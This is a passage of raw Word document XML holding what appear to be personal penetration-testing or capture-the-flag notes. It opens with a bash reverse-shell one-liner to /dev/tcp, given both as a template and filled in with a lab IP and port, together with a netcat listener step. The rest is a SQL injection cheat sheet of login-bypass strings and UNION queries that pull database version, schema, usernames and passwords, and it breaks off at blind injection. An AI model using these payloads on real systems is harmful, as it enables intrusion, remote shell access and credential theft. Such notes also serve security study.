        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash -c "bash -i &gt;&amp; /dev/tcp/{local_IP}/[port] 0&gt;&amp;1"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001883">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash -c "bash -i &gt;&amp; /dev/tcp/10.10.16.63/4444 0&gt;&amp;1"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001884">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SET UP rlwrap netcat listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001885">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure to put in your own ATTACKING LOCAL IP AND ALSO, once you copy and paste it will run immediately so make sure to change it to your own IP before you copy and paste</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001886">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001887">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001888">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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t xml:space="preserve">Notes about SQL Injections and Errors (WAF):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000188C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="911"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes, WAF (Web Application Firewall) stops tools like SQLMap from working, since they send too many requests. That's why sometimes SQLMap doesn't work even though manually putting in SQL injections to bypass login authentication works sometimes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000188D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="911"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLMap and SQL injections can be used for more than login authentication bypass. They can be used when in the "search" bars, since search bars often use SQL to retrieve data, so you can do something along the lines of injecting SQL code to access tables that you weren't supposed to see. That's what SQLMap also checks</w:t>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t xml:space="preserve">SQL Injections:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001891">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="735"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' or 1=1 -- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001892">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="735"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Put this into the username section and put some dummy value in password</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001893">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="735"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">test' or 1=1;-- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001894">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="735"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" or 1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001895">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="735"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin'#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001896">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="735"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Put this in username to log in as admin or try any other username</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001897">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="735"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin' #</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001898">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="735"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin' --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001899">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="735"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin' -- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000189A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injections to get information from tables:</w:t>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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Manual SQL Injection techniques involve directly interacting with a database through vulnerable user input fields. Below are common manual SQL injection techniques to retrieve information from a database:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Retrieving Database Information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018A2">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the target is vulnerable, use SQL commands to extract database details:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018A3">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="40" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Extracting Database Version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018A4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT @@version, NULL-- </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018A5">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="40" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Identifying Current Database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018A6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT database(), NULL--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018A7">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="40" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding Current User</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018A8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT user(), NULL--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018A9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018A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AB">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Extracting Table and Column Names</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018AC">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="771"/>
        </w:numPr>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Customization needed: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace 'users', 'table_name', 'column_name' with the actual table name (which you may discover through earlier queries like extracting table names).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018AD">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If database schema information is accessible, use these commands:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018AE">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="40" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Extract All Table Names (MySQL Example)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018AF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT table_name, NULL FROM information_schema.tables WHERE table_schema=database()--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018B0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018B1">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="40" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Extract All Column Names for a Specific Table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018B2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name='users'--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018B3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018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B5">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Retrieving Data from Tables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018B6">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="193"/>
        </w:numPr>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Customization needed:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Replace username, password, and users with the actual column and table names from the target database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018B7">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you have table and column names, you can extract data:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018B8">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="40" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Extract Usernames and Passwords</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018B9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT username, password FROM users--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018BA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018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BC">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Blind SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018BD">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the database doesn't return output directly, use blind techniques:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018BE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1325"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Boolean-based Blind SQL</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1325"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' AND 1=1--</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Returns normal page)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1325"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
